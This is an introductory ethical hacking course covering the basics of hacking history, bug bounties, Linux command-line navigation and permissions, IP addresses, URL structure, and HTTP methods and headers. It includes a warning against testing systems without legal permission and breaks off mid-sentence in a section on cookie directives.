Ethical Hacking ABC
Basics
In this section, we will cover the basics of IT, focusing on the command line, computer
networks, and the fundamentals of websites. The aim is to provide everyone with the
tools to progress in the course as well as develop their own IT skills. The course topics
have been selected and summarized in a way that we hope will provide the best
foundation for further learning opportunities.
Spend time on this section!
If you already have experience in the topics of the course and you understand them
well enough, you can definitely try other courses. But if you are a novice in the field of
information technology and the terms of the course sound unfamiliar, this course is for
you. The purpose of the course is to ease the learning curve and clarify certain
basic principles on which other courses build.
A few things about hacking
In order to learn how to find cybersecurity vulnerabilities in systems, you need to first
understand how the systems work. This reality also applies to the toughest
professionals in the cybersecurity field. In movies, hacking happens magically in just a
few minutes, as if there is a clear formula to follow. This is not true in the real world.
Every cybersecurity professional first spends a lot of time getting to know the target
and understanding its operation. It is essential to understand the basic rules and
principles on which everything operates.
What is ethical hacking?
History of Hacking
The word hacking is centuries old. It originally referred to cutting something roughly
and violently and had nothing to do with technology, which did not yet exist.
According to one source, the term was also used among model train enthusiasts
before computers.
However, modern-day hacking originated in the 1950s when technology enthusiasts
explored and experimented with telecommunications infrastructure, namely landline
telephones. A well-known trick back then was whistling into a pay phone to
manipulate the system and make free calls. This field of study was known as Phone
Phreaking, and individuals who engaged in it were called Phreakers.
Technology advanced and computers as well as computer networks began to be used
widely. In the same way, the Phone Phreaking culture transitioned into computers and
computer networks. It is good to understand that at that time there were no laws or
understanding that this could be used for malicious purposes. Similarly, these
enthusiasts were not operating from a harmful perspective, so to speak. It was just a
group of people who had a great interest in the subject area and what could be done
with this new and ever-evolving technology.
With few exceptions, hacking as a means for financial gain or harm reached new scales
only when companies realized that the Internet can be used for business operations
and internet commerce became a booming industry. This also created the need to
protect customer and system information. Since then, the entire field of hacking has
been a cat-and-mouse game, where attackers come up with new ways to breach
systems and defensive individuals try to patch vulnerabilities and invent new ways to
defend systems.
At this point, the concept of an ethical hacker comes into play.
What is a white hat hacker?
An ethical hacker, or white hat hacker, is a person who knows how to break into
computer systems, just like a computer criminal does. Instead of engaging in illegal
activities, however, a white hat hacker helps organizations such as companies discover
vulnerabilities before criminals find them.
An experienced professional can also advise a company on how to improve the security
of systems, people, buildings, and processes in order to make the work of criminals
more difficult. This is important because security does not mean that there are no
vulnerabilities in the application. Rather, security means that even if there is a
vulnerability in the application, it cannot cause significant damage before the attack
is detected and mitigated.
How do white hat hackers earn their living?
Cybersecurity is currently at the forefront of almost every company's daily operations,
and Finland has a wide range of different cybersecurity professions. These include
technical cybersecurity consultants who perform information system penetration
testing.
In addition to job positions, many companies have so-called bug bounty programs, in
which the company gives permission (either to anyone or to specifically invited
hackers) to search for vulnerabilities, for example, on their own website and then
rewards the findings.
Bug bounty programs
Bug bounty programs refer to the practice where a company grants permission to
private cybersecurity professionals to search for vulnerabilities in the company's
systems. Typically, the company specifies what may be tested, where, and how, and
private professionals search for vulnerabilities, or "bugs," as they are also known,
within those rules. Often, a monetary reward is given for a discovered vulnerability.
In fact, there are people in the world who make a living solely by participating in
these programs, as significant rewards can be paid for serious vulnerabilities.
Bug bounty platforms, such as HackerOne or Intigriti, are platforms where these
programs are aggregated, and all communication with the company in question takes
place on the platform.
However, it is important to remember that cybersecurity testing and bug bounty
programs differ. Bug bounty programs rarely pay for anything that does not
have a direct impact on the company's operations. This means that vulnerabilities,
both significant and minor, may be overlooked in these programs. Cybersecurity
testing, on the other hand, aims to find as many vulnerabilities as possible and
also to identify areas for improvement, so that even if a vulnerability is found,
the resulting damage can be minimized.
Important warning
When you have learned to search for vulnerabilities, you will notice that there are
actually quite a lot of them, and it is not difficult to find vulnerable targets online.
However, it is extremely important that you never carry out any kind of attack, or
even test whether an application is vulnerable, if you do not have legal permission
for it. Committing a data breach can result in fines or imprisonment, but above all, you
can ruin your chances of getting a job in the field.
There is no sense in throwing away the possibility of getting to hack all day for a living,
learn from colleagues and become a top expert in the field due to foolishness. Not to
mention the kind of mental suffering that data breaches cause to both those whose
information has leaked into the hands of who knows who, and to those who were
responsible for protecting the data.
So let's stay on the right path!
First encounter with the command line
The Linux command line is a text-based program that provides an interface between
the user and the operating system. The command line usually runs a command
interpreter program that handles the execution of commands entered on the command
line. There are many different command interpreter programs, but one of the most
common is Bash, also known as the Bourne Again Shell. The command line is used
through text-based commands, unlike graphical applications where the user interacts
with a mouse. This gives rise to the definitions of CLI, which stands for Command Line
Interface, and GUI, which stands for Graphical User Interface. Almost all possible tasks
can be performed on the command line, often faster than using graphical tools.
Additionally, it also supports automation, allowing you to run multiple commands at
once, which is useful, for example, in cybersecurity testing.
The command line allows for unlimited different use cases and speeds up many tasks,
but the best way to learn how to use the command line is to boldly try it out yourself.
Notice the text that ends with a dollar sign. This is called a prompt, and it tells you that
the command line is ready to receive commands. It is important to understand that
when you run a command, the output produced by the command is almost always
displayed directly on the command line, and when the command is finished, the
prompt appears again. Depending on the command, a lot of text can appear, while
sometimes no text may be printed at all.
Working Directory
A working directory refers to the location in the file system where your command line
operates. It is important for the command line to maintain information about the current
working directory, as it needs to be able to create, modify, and delete files and
directories. This would not be possible if the command line did not know where these
operations should be performed. By default, the command line creates, modifies, and
deletes files that are located in the current working directory of the command line.
Write the following command and press enter.
pwd
This should return your current working directory, which is the path to your home
directory. pwd stands for print working directory. So if you ever want to know your
current working directory, use the pwd command.
Command Line Navigation
The location of the working directory can be changed with the cd command, which
stands for change directory. The cd command takes a path or directory name and
changes the working directory to this new location.
cd kansio
The image below shows how the command line's working directory was changed to
point to the root of the file system. Then, the location pointed by the working directory
was checked using the pwd command.
Unlike the Windows operating system, Linux does not place different disks under
their own drive letters. The / directory, also known as the root directory, is the base
of the file system. You can think of / in the Linux world as the counterpart of the
familiar C:\ in the Windows world, with the exception that in the Linux world nothing
is located under a separate drive such as D:\; everything is found under the root.
The ls command comes from the word list and simply lists the files and directories in
the given path.
ls /home/
Simply giving the ls command to the command line lists the folders and files under the
current working directory. The command can also be specified with a path to list the
files located beneath it.
The command "ls" is executed in the root of the file system in the image below, and
the -l flag is used in the command to provide a more user-friendly listing.
To move the working directory upwards in the folder structure (that is, closer to
the root), use two dots.
cd ..
In the image below, first the pwd command is executed and it can be seen that the
current working directory points to /home/student-path. Then, with the cd command,
we move one directory up and confirm the change of the new working directory again
with the pwd command.
In the image below, the current location of the working directory is first checked. After
that, we move directly to the root without going through the /home directory. Finally,
we ensure that we are in the root.
Finally, entering the cd command on its own changes the working directory back
to your home directory, in this case /home/student.
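The navigation steps above can be tried together in one short session. This is only a sketch: it works inside a throwaway directory created with mktemp, and the folder names a and b are made up for the illustration.

```shell
# Throwaway directory tree; the names a and b are hypothetical.
start_dir=$(mktemp -d)
mkdir -p "$start_dir/a/b"

cd "$start_dir/a/b"
pwd                    # prints the full path, ending in /a/b

cd ..                  # one level up, towards the root
parent=$(pwd)
echo "$parent"         # the path now ends in /a

cd /                   # jump straight to the root
root=$(pwd)
echo "$root"           # prints /

cd "$start_dir"        # return to the scratch directory
```

Running pwd after every cd, as in the walkthrough above, is a simple way to confirm where you ended up.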
Folder creation
Next, we will practice working with folders. Let's start by creating a new folder using
the mkdir command. The command stands for make directory, which means create a
folder.
mkdir kansio
In the image below, we created a new folder named "exercise" and confirmed that it
was created successfully with the "ls" command.
It is also possible to create multiple folders by specifying them one after another on the
mkdir command.
mkdir kansio1 kansio2 kansio3
In the image below, we created two new folders and ensured that they were created
successfully.
New folders can also be created nested by giving the mkdir command the -p switch.
mkdir -p kansio1/kansio2/kansio3
In the image below, we created two nested folders and confirmed the success of the
command by running the ls command from inside the first folder.
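The three ways of using mkdir described above can be combined into one short sketch. It runs in a scratch directory created with mktemp, and the names sub1 and sub2 are made up for the illustration.

```shell
work=$(mktemp -d)      # scratch directory so nothing real is touched
cd "$work"

mkdir exercise                      # one folder
mkdir kansio1 kansio2               # several folders at once
mkdir -p kansio1/sub1/sub2          # nested folders, parents created as needed

ls                                  # lists exercise, kansio1 and kansio2
ls kansio1                          # lists sub1
```

Note that -p does not complain when part of the path, here kansio1, already exists.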
In the image below, we created a new file using the touch command and confirmed the
success of the command by using the ls command.
When you want to see the contents of a file on the command line, you can use,
for example, the cat command. The cat command comes from the word concatenate,
which means to link or join together. In practice, the command simply prints
the contents of the file to the command line.
cat tiedosto.txt
In the image below, we tried to print the contents of two different files using the cat
command. One of the files was empty, and the other was not.
There are several different editing programs for editing text-based files, such as vim,
emacs, and perhaps the most famous one, nano. Nano is the simplest to use out of
these three and the easiest way to start editing on the command line, so we will use it
in this course for file editing.
You can launch the nano program by giving it an existing file name. Alternatively, you
can also give it a new file name, in which case nano will create that file.
nano tiedosto.txt
The nano program opens on the command line and lets you write freely into
the file. When you are ready, you can save the file and close the program
by pressing Ctrl+X, then Y, then Enter. You can check the content of the edited file
using the cat command.
Below is a picture of the nano program.
On the Linux command line it is possible to redirect output, for example, to a file.
This is done with the > character. The < character works in the other direction and
redirects input from a file to a command.
echo "Teksti menee" > tiedostoon.txt
By using a single > sign, the command line overwrites all existing content in the file. If
you want to redirect the output to a file without overwriting existing content, use two
> signs (>>).
In the image below, we redirect two outputs to a file. We notice how using a single
greater-than sign (>) overwrites the file and how using two (>>) appends to the end of
the file. It is important to note that if the file does not exist before redirection, the
command line will create a new file.
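The difference between > and >> is easiest to see by running both against the same file. A minimal sketch, assuming a scratch directory and a made-up file name notes.txt:

```shell
work=$(mktemp -d)                          # scratch directory

echo "first line"  >  "$work/notes.txt"    # file does not exist yet, so it is created
echo "second line" >  "$work/notes.txt"    # single > overwrites the previous content
echo "third line"  >> "$work/notes.txt"    # double >> appends to the end

cat "$work/notes.txt"                      # shows "second line" and "third line"
```

The text "first line" is gone because the second redirection replaced the whole file.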
Redirecting output may seem simple and even unnecessary at this stage, but it is an
important part of command line usage. For example, you can pass the output of
one command to the next command as input by using the pipe character (|).
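Passing the output of one command to another is usually done with a pipe (|). The sketch below counts the .txt files in a scratch directory. The grep command is not covered in this section and is used here only as an assumption for the illustration, and the file names are made up.

```shell
work=$(mktemp -d)                               # scratch directory
touch "$work/a.txt" "$work/b.txt" "$work/c.log"

# ls writes the file names, grep -c counts the lines that end in .txt
txt_count=$(ls "$work" | grep -c '\.txt$')
echo "$txt_count"                               # prints 2
```

The listing never appears on the screen. It goes straight into grep, which prints only the count.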
Moving Files and Folders
Renaming files and directories as well as moving them can be done using the mv
command, which stands for move.
mv vanha.txt uusi.txt
In the image below, we are renaming the file.
Using the same principle, you can move files or folders by first specifying the original
location and then the destination.
# moves the file into the folder
mv tiedosto.txt kansio/
In the image below, we first move the file named file2.txt to a folder, and then we move
both txt files back to the current working directory using the wildcard character (*) and
dot.
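Renaming, moving into a folder and moving back with a wildcard can be sketched as follows. The session runs in a scratch directory, and the files are created with touch only so that there is something to move.

```shell
work=$(mktemp -d)            # scratch directory
cd "$work"
mkdir kansio
touch vanha.txt tiedosto.txt

mv vanha.txt uusi.txt        # rename: same directory, new name
mv tiedosto.txt kansio/      # move the file into the folder
mv uusi.txt kansio/

mv kansio/*.txt .            # move every .txt file back; the dot is the current directory
ls                           # lists kansio, tiedosto.txt and uusi.txt
```

The same mv command handles both cases: if the destination is an existing folder the file is moved into it, otherwise the destination is taken as the new name.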
Deleting Files and Folders
File deletion is done using the rm command, which comes from the word remove.
rm tiedosto.txt
In the image below, we first remove two txt files with the rm command and finally
remove the last remaining file. We could have also removed all files by executing rm *.
Deleting folders differs slightly from deleting files, as the rm command on its own
does not delete folders. There are two ways to delete folders depending on the
situation. You can delete an empty folder using the rmdir command.
rmdir kansio
If the folder is not empty, you can use the rm command with the -r option. The -r option
deletes the folder and all the folders and files inside it. The rm command also has the
-d option, which deletes the folder only if it is empty, similar to rmdir.
rm -r kansio # deletes the folder and everything inside it
rm -d kansio # deletes the folder if it is empty
rmdir kansio # deletes the folder if it is empty
In the image below, we first remove the folder named "kansio2" using the rmdir
command. After that, we try to delete the folder named "kansio" and find that it is not
empty. Then, we delete the folder and the file it contains using the -r option.
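The sequence described above can be reproduced with the following sketch. It runs in a scratch directory, and the variable result exists only to record what happened in this illustration.

```shell
work=$(mktemp -d)                 # scratch directory
cd "$work"
mkdir kansio kansio2
touch kansio/tiedosto.txt

rmdir kansio2                     # works: the folder is empty

# rmdir refuses to remove a folder that still contains a file
if rmdir kansio 2>/dev/null; then
  result="removed"
else
  result="not empty"
fi
echo "$result"                    # prints: not empty

rm -r kansio                      # removes the folder and the file inside it
```

Because rm -r deletes everything below the given folder without asking, it is worth checking the path with ls before running it.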
This module lists some use cases for commands, but we recommend familiarizing
yourself with and freely experimenting with commands. These can be safely tested in
a lab environment.
File system permissions
Finally, let's go over file system permissions, that is, how file and folder permissions are
interpreted and defined in a Linux environment.
You can get a listing similar to the image by using the -l switch in the ls command.
In a Linux environment, both files and directories have permissions defined (inside the
orange box) and an owner-user as well as an owner-group (inside the blue box).
Let's start with the owners. Each user belongs to a group. So, as shown in the picture,
the owner-user of each file is student (on the left) and the owner-group of each file is
student (on the right).
-rwxr-xr-x 1 bob staff 72 Jun 6 19:49 test.sh
By default, the group is the same as the username, and only that user belongs to the
group. However, this can also be defined differently. For example, the owner user of the
test.sh file above is bob, and the owner group is staff.
The file permissions are interpreted as follows:
Permissions are divided into three categories: the owner's permissions (orange), the
group's permissions (green), and others' permissions (blue). The example permissions
therefore allow the following:
The owner-user can read, write, and execute the specified file.
The owner group can read and execute the file in question.
Other users can read and execute the specified file.
Note: directories are a special case. A directory must always have the execute
permission if it is to be used as a working directory.
The file permissions can be interpreted in two different ways. Either read, write and
execute or in octal, also known as numerical.
Numerical interpretation is done as follows.
Read (r) - 4
Kirjoita (w) - 2
Execute (x) - 1
For example, if the file permissions were rw- rw- r--, the permissions would be
interpreted numerically as 4+2 = 6, 4+2 = 6, and 4. In practice, the permissions rw-
rw- r-- can also be interpreted as 664.
rw- or 6 - owner can read and write
rw- or 6 - the owner group can read and write
r-- or 4 - other users can only read
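The arithmetic above can be written out as a small shell function. This is a sketch for illustration only: perm_to_octal is a made-up helper, not a standard command, and it expects the nine permission characters without the leading file type character.

```shell
# Hypothetical helper: convert a permission string such as rw-rw-r-- to octal.
perm_to_octal() {
  perms=$1
  result=""
  while [ -n "$perms" ]; do
    triplet=$(printf '%s' "$perms" | cut -c1-3)   # next group of three characters
    perms=$(printf '%s' "$perms" | cut -c4-)      # the rest of the string
    digit=0
    case $triplet in r??) digit=$((digit + 4)) ;; esac   # read
    case $triplet in ?w?) digit=$((digit + 2)) ;; esac   # write
    case $triplet in ??x) digit=$((digit + 1)) ;; esac   # execute
    result="$result$digit"
  done
  printf '%s\n' "$result"
}

perm_to_octal "rw-rw-r--"   # prints 664
perm_to_octal "rwxr-xr-x"   # prints 755
```

The second call uses the permissions of the test.sh example: 4+2+1 = 7 for the owner and 4+1 = 5 for both the group and others.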
The chmod command comes from the words change mode and is used to define
file and directory permissions. This can be done, for example, like this:
chmod 664 tiedosto.txt
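To confirm that the change took effect, the permissions can be read back with ls -l. A minimal sketch in a scratch directory; the cut command is not covered in this section and is used here only to pick out the first ten characters of the listing.

```shell
work=$(mktemp -d)                       # scratch directory
touch "$work/tiedosto.txt"

chmod 664 "$work/tiedosto.txt"          # rw- for owner, rw- for group, r-- for others

# The first ten characters of ls -l are the file type and the permissions.
mode=$(ls -l "$work/tiedosto.txt" | cut -c1-10)
echo "$mode"                            # prints -rw-rw-r--
```

The leading dash marks a regular file; for a directory the first character would be d.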
The chown command comes from the words change owner and it can be used to
define both the owner and the owner group for a file. In the example below,
omistaja stands for the owner and ryhmä for the group:
chown omistaja:ryhmä tiedosto.txt
Internet addresses
Website address
In order to successfully communicate online, we need a way to identify and determine
the location of a device on the network. We also need a way to distinguish between
networks. This is the job of the IP address. The concept is very similar to a traditional
home address combined with the numbers and letters that identify individual
apartments. For example, all the apartments in one residential complex are located at
the same address and are distinguished from each other using a number and/or letter.
Domain
Since using IP addresses in everyday life would be impractical
and difficult, a concept called a domain name has been developed. Domain names,
such as google.com or hakatemia.fi, are simply easier-to-remember equivalents of IP
addresses.
Localhost - My computer
Localhost, or the corresponding IPv4 address 127.0.0.1, is an address that always refers
to the computer itself, and it can only be reached from that computer. It is not an IP
address that is accessible on the internet. Typically, a computer has at least two
different IP addresses: 127.0.0.1 and another that allows your computer to communicate
with, for example, your home modem. Whether or not you are connected to a network,
such as via Wi-Fi, your computer always has the address 127.0.0.1. So, for example,
you can run a website on your computer and access it from a browser by
using the localhost address.
Address 0.0.0.0
Address 0.0.0.0 is an address that typically appears in routing tables and port listings.
This address refers to all addresses at the same time. For example, if your device is
connected to multiple networks (such as WiFi and cable), you can set a service on your
computer to be open to all available networks by setting the service to listen to the
address 0.0.0.0. It is important to understand that you cannot actually connect to this
address; you need a specific address for that.
Client-server model
The client-server model is an architecture in which client devices and programs connect
to server programs. For example, when retrieving a webpage, the browser is the client
that contacts the web server, and the web server returns the webpage to
the browser. This retrieval is done using either the HTTP or HTTPS protocol, but the
same model also applies to other protocols. A protocol is simply the set of rules
that defines how the client and server communicate with each other. The
protocol specifies the format in which the request message must be sent and the
format of the response the server returns, so that the client can
interpret the response correctly and communication can continue without disruptions.
Ports
Since a single server can provide users with many different server applications, such as
websites, email services, remote access services, and countless other services, the
client and server must have a way to distinguish these different channels from each
other. This is where the concept of ports comes in. A port is a number from 0 to 65535
that identifies a particular service on a server; for example, web servers conventionally
use port 80 for HTTP and port 443 for HTTPS. Ports are an extremely important
concept for the functioning of computer networks.
It is important to understand how protocols, ports, and the client-server model are part
of the same entity. The client-server model describes the operating model of how a
client, for example a browser, requests a web page and the server responds to this
request by returning the web page to the browser. Ports, on the other hand, are
channels through which this request can be implemented, and the protocol instructs
the format in which this request and response should be.
Client-side and server-side
The browser and server sides refer to two different areas that are responsible for the
functioning of a website. The browser side covers everything that is visible to the user
or with which the user interacts. This generally refers to the user interface of a website.
From the perspective of the client-server model, the browser is the client that presents
the user with the web page interface. When a user visits a web page, the browser
makes a request to the web server, which returns the interface to the browser.
Everything on the browser side is called the frontend. This
includes, for example, images, text, colors, styles, buttons, icons, and practically
everything that the user interacts with in some way.
The task of the server side (also known as backend) is to provide a user interface and
support the functionality of the browser side. For example, when you register on a
website, you fill in your user information on a registration form. Afterwards, the browser
sends the information to the server, which can, for example, verify the correctness of
the given information and check that the same user does not already exist. After this,
the server can create a new user in the database with the provided information. The
actions happening on the server side are naturally invisible to the user.
URL structure
What is a URL address?
URL stands for Uniform Resource Locator and is one of the cornerstones of the HTTP
protocol. Put simply, a URL refers to an individual resource on a website, which
can be, for example, an HTML page, a resource used by an HTML page, or even a plain
text file.
Different types of URL addresses:
http://hakatemia.fi/
http://hakatemia.fi/index.html
http://hakatemia.fi/robots.txt
https://hakatemia.fi/kuva.png
https://hakatemia.fi/kansio/tiedosto.txt
https://hakatemia.fi/rekisteroidy?nimi=aku&sposti=aku.ankka@g
Parts of a URL
A URL consists of different components, some of which are mandatory, while
others are optional. The components used in a URL are partly defined by
application developers, although the user is able to modify them.
The application may, for example, contain a link where the application defines the
desired URL address and the components contained within it, but nothing prevents the
user from changing this address.
Scheme
The first component in the URL is the scheme. The scheme tells the browser
which protocol the request is made with. The protocol is usually either unencrypted
HTTP or the secure HTTPS protocol.
Authority or Domain
The part following the schema is the name of the authority maintaining the resource,
which is the domain. As mentioned in the section about computer networks, a domain
is just a more easily memorable name for an IP address, so an IP address can also be
used directly instead of a domain name.
Authority tells the browser from which server the resource is to be retrieved. For
example, www.google.com tells the browser that the resource is to be fetched from
Google's server, so the browser naturally tries to communicate with Google over the
network.
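Port
The port is an optional component that follows the authority, separated by a colon.
If it is left out, the browser uses the default port of the protocol: 80 for HTTP and
443 for HTTPS.
Resource path
After the authority and port, it is possible to specify the resource path to which the
HTTP request is targeted. The resource path can be thought of as the file path of a web
server.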
However, this is not as simple in modern times because resource paths are often
abstractions nowadays, where different resource paths or "routes" of a webpage and
the requests to these are handled in code, and the paths are not concrete files.
Parameters
Parameters are optional key-value pairs that come after a question mark
and are separated by the & symbol. A website can use these values defined in the
parameters if desired. The use and handling of the parameters are entirely at the
discretion of the website creators, and their usage varies widely.
Parameters are a significant way to transmit detailed information between the browser
and the application. Therefore, the parameters in use are also of interest from a
cybersecurity testing perspective. Many vulnerabilities arise from applications not
handling the values contained in parameters correctly.
Anchor
The anchor is the last part of the URL and is completely optional. It begins with a #
character and tells the browser which specific part of the requested resource should
be displayed to the user. So, if the requested resource were for example a recipe,
the anchor could be #measurements, which would automatically navigate the browser
to that specific section once the resource is loaded in the browser.
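The components described above can be pulled apart with plain shell parameter expansion. This is a simplified sketch rather than a complete URL parser, and the example URL is made up for the illustration: the port 443, the parameter kieli=fi and the anchor #osio are assumptions.

```shell
# Hypothetical URL containing every component.
url='https://hakatemia.fi:443/kansio/tiedosto.txt?nimi=aku&kieli=fi#osio'

scheme=${url%%://*}                 # everything before ://
rest=${url#*://}                    # everything after ://

fragment=""                         # the anchor, if there is one
case $rest in *'#'*) fragment=${rest#*\#}; rest=${rest%%\#*} ;; esac

query=""                            # the parameters, if there are any
case $rest in *'?'*) query=${rest#*\?}; rest=${rest%%\?*} ;; esac

authority=${rest%%/*}               # up to the first slash
case $rest in */*) path=/${rest#*/} ;; *) path=/ ;; esac

host=${authority%%:*}
port=""
case $authority in *:*) port=${authority##*:} ;; esac

echo "scheme=$scheme host=$host port=$port path=$path anchor=$fragment"
printf '%s\n' "$query" | tr '&' '\n'    # one key=value pair per line
```

The anchor is stripped first and the parameters second because both come after the path, and the anchor is always last.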
HTTP protocol
What is the HTTP protocol?
HTTP is primarily a protocol used by web browsers, which both the browser and the
web server hosting the webpage must respect. The HTTP protocol defines how
communication between these two should occur, so that both parties can understand
each other's needs correctly.
When the browser visits a website, the browser sends an HTTP request to the web
server according to the client-server model. Upon receiving the request, the web
server sends an HTTP response to the browser, typically containing the requested
page.
HTTP Request Structure
The HTTP request sent by the browser consists mainly of the HTTP method, resource
path, HTTP protocol version, and HTTP headers.
Depending on the HTTP request method, the request may also include a body
(the HTTP body). This is used when data needs to be passed from the
browser to the application. For example, when a user logs into an application, the
HTTP request made by the browser typically uses the POST method and the login
information is transferred in the HTTP body.
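To make the structure concrete, the sketch below assembles the text of a login request by hand and prints it without sending anything over the network. The path /login, the HTTP/1.1 version and the header values are assumptions made for this illustration, not taken from a real application.

```shell
# Body of the request: form fields as key=value pairs.
body='kayttajatunnus=teppo.tavis@hakatemia.fi&salasana=salasana123'

# Content-Length tells the server how many bytes of body to expect.
length=$(printf '%s' "$body" | wc -c | tr -d ' ')

# Request line (method, path, version), headers, an empty line, then the body.
request=$(printf 'POST /login HTTP/1.1\r\nHost: www.hakatemia.fi\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %s\r\n\r\n%s' "$length" "$body")

printf '%s\n' "$request"
```

The empty line is what separates the headers from the body. A request without a body, such as a typical GET, simply ends after it.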
Structure of HTTP response
In an HTTP response, the website/server returns the HTTP protocol version used, along
with the status code, HTTP headers, and the requested resource.
The HTTP response returned by the server can contain, for example, HTML code that
the browser converts into a visual format, but this is not required. The information
contained in the HTTP response is entirely at the discretion of the application builder.
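The same parts can be picked out of a response with ordinary text tools. The response below is a made-up sample stored in a variable, not the output of a real server, and the sed and tr commands are used here only as assumptions for the illustration.

```shell
# Hypothetical response: status line, one header, an empty line, then the resource.
response=$(printf 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<h1>Hello</h1>')

# The first line carries the protocol version and the status code.
status_line=$(printf '%s\n' "$response" | head -n 1 | tr -d '\r')
version=${status_line%% *}
rest=${status_line#* }
status_code=${rest%% *}

# Everything after the first empty line is the returned resource.
body=$(printf '%s\n' "$response" | tr -d '\r' | sed '1,/^$/d')

echo "version=$version status=$status_code"
echo "$body"
```

A browser performs the same split before deciding what to do with the body, for example rendering it as HTML.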
HTTP methods
The HTTP protocol enables the use of different request types or methods, which refer
to different tasks that the client (browser) wants the web page to perform. For example,
if a user saves data to a web page, such as user information, it is expected that the
browser does this using the POST, PUT, or PATCH method. However, since the
operation of the web page is completely in the hands of the developer, the browser can
make this storage request using almost any request type, but this is against best
practices.
HTTP methods can be thought of as actions that change or read the state of a
webpage.
It is also important to understand that the use of these different methods also affects
the format of the HTTP message.
GET method
The GET method is definitely the most commonly used HTTP request type and the
default request type that the browser sends, unless otherwise specified for the
browser. So the browser defaults to using the GET request type, for example, when
navigating by clicking in the browser.
With a GET request, the browser typically requests the webpage to return the
requested resource.
Below is an example of what a GET request might look like. This particular GET request
occurred when the browser directly navigated to the address
https://www.hakatemia.fi/.
HTTP request
GET / HTTP/2
Host: www.hakatemia.fi
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
POST method
Unlike the GET method, which is intended to retrieve information or a resource, the POST
method is designed for sending data from the browser to the web page. The POST
request can contain an HTTP body where the data is located.
The following POST request is an example of what a POST request may look like when
you log in to a website.
HTTP request
kayttajatunnus=teppo.tavis@hakatemia.fi&salasana=salasana123
PUT method
The PUT request type can be used for the same purpose as POST, but its original idea was
to be a request type that replaces a desired resource with another. Unlike POST, which
is intended to store individual information, such as a user, the idea behind the PUT
request type was to replace an entire entity or resource with another one. But as
already mentioned, the usage of HTTP methods and the behavior of a webpage with
these different request types is completely up to the webpage developer.
In the following PUT request, the user signs up for Hakatemia's email list.
HTTP request
{"email":"teppo.tavis@hakatemia.fi"}
DELETE method
The purpose of the DELETE request type is simply to delete a resource or entity. This
may be used, for example, in various APIs.
The DELETE request below could, for example, remove the user's profile picture.
HTTP request
PATCH method
The basic idea of the PATCH method is to make partial changes to the desired
resource. Unlike in the case of the PUT method, the purpose of PATCH is to modify the
resource only partially.
The following PATCH request could, for example, change the user's name.
HTTP REQUEST
{
"kayttaja": {
"id": 12345,
"Name": "Teppo Tavis"
}
}
OPTIONS method
The purpose of the OPTIONS method is to ask the website which communication methods
are allowed for a specific resource. The response typically includes a list of the
allowed HTTP methods. The OPTIONS method is also used in the CORS (Cross-Origin
Resource Sharing) mechanism, where the browser can send an OPTIONS "preflight"
request to check whether a cross-origin request is permitted before sending it.
HTTP REQUEST
HEAD method
The HEAD method asks the website to return the same response it would return for a
GET request, but without the requested resource itself. In other words, the website is
asked to return only the response status code and headers.
HTTP REQUEST
HEAD / HTTP/2
Host: www.hakatemia.fi
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
There are several HTTP request types and, as the methods above show, their purposes
partly overlap. There is no inherent risk if the developer decides to use, for example,
the PUT method instead of the POST method for storing data. Keep in mind that these
are only requests that the browser sends to the website, hoping for a certain response.
In theory, it is entirely possible to build a website that behaves in the opposite way
to what the HTTP protocol intends. This is entirely up to the developer.
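To make the differences between the methods concrete, the sketch below builds (but never sends) a few requests with Python's standard urllib.request module. The host, paths, and body values are hypothetical placeholders chosen for illustration; they are not endpoints taken from the course.

```python
import json
from urllib.request import Request

BASE = "https://www.example.com"  # placeholder host (assumption), nothing is sent to it

# Without a body and without an explicit method, urllib defaults to GET.
get_req = Request(BASE + "/")

# Supplying a body (data) switches the default method to POST.
post_req = Request(BASE + "/login", data=b"username=alice&password=secret")

# Other methods have to be named explicitly.
put_req = Request(
    BASE + "/profile",
    data=json.dumps({"email": "alice@example.com"}).encode(),
    headers={"Content-Type": "application/json"},
    method="PUT",
)
delete_req = Request(BASE + "/profile/picture", method="DELETE")
head_req = Request(BASE + "/", method="HEAD")

for req in (get_req, post_req, put_req, delete_req, head_req):
    body_size = len(req.data) if req.data else 0
    print(f"{req.get_method():6} {req.full_url} ({body_size} body bytes)")
```

Whether the server actually treats PUT differently from POST is, as noted above, decided by the developer of the website and not by the client.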
HTTP Headers
HTTP headers are part of both the HTTP message sent by the browser and the
response returned by the website, and they contain additional information and
instructions.
In an HTTP request, headers can provide information to a website, such as the type of
device making the request, so that the website can tailor the response to fit the device.
Headers are also used, for example, for authentication and maintaining login status, as
well as for many other purposes. Good examples are the Content-Type and Content-
Length headers, which indicate the format and size of the data sent by the browser.
Headers in HTTP responses serve the same purpose as in the requests. They allow a
website to provide additional information about the returned data and provide
instructions to the browser on how it should behave.
In the following HTTP request, the highlighted fields are interpreted as HTTP headers.
After the HTTP headers, the actual data that the browser sends to the website follows.
In the following HTTP response, the highlighted fields are interpreted as HTTP headers.
After the HTTP headers, the HTTP body returned by the web page comes.
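The split between headers and body can also be shown in code. The sketch below is a simplified illustration for the text form of a request as tools such as Burp Suite display it: it ignores details like repeated headers, and the request itself is a made-up example rather than one captured from the course targets.

```python
def parse_http_request(raw: str):
    """Split a raw text-form HTTP request into request line, headers, and body."""
    # An empty line (CRLF CRLF) separates the headers from the body.
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    request_line = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        # Header names are case-insensitive, so store them in lowercase.
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


example_body = "username=alice&password=secret"  # hypothetical form data
raw_request = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(example_body)}\r\n"
    "\r\n"
    + example_body
)

request_line, headers, body = parse_http_request(raw_request)
print(request_line)
print(headers["content-type"], headers["content-length"])
print(body)
```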
Cookie directives
Cookies always come with parameters, or "additional instructions", that tell the
browser how the cookie in question should be used. These are called directives
(also known as attributes), and the website can define them when it sets the cookie.
If they are not specified, the browser uses its built-in default values. A few
directives are listed below.
Expires
The Expires directive is optional and determines the date and time until which the
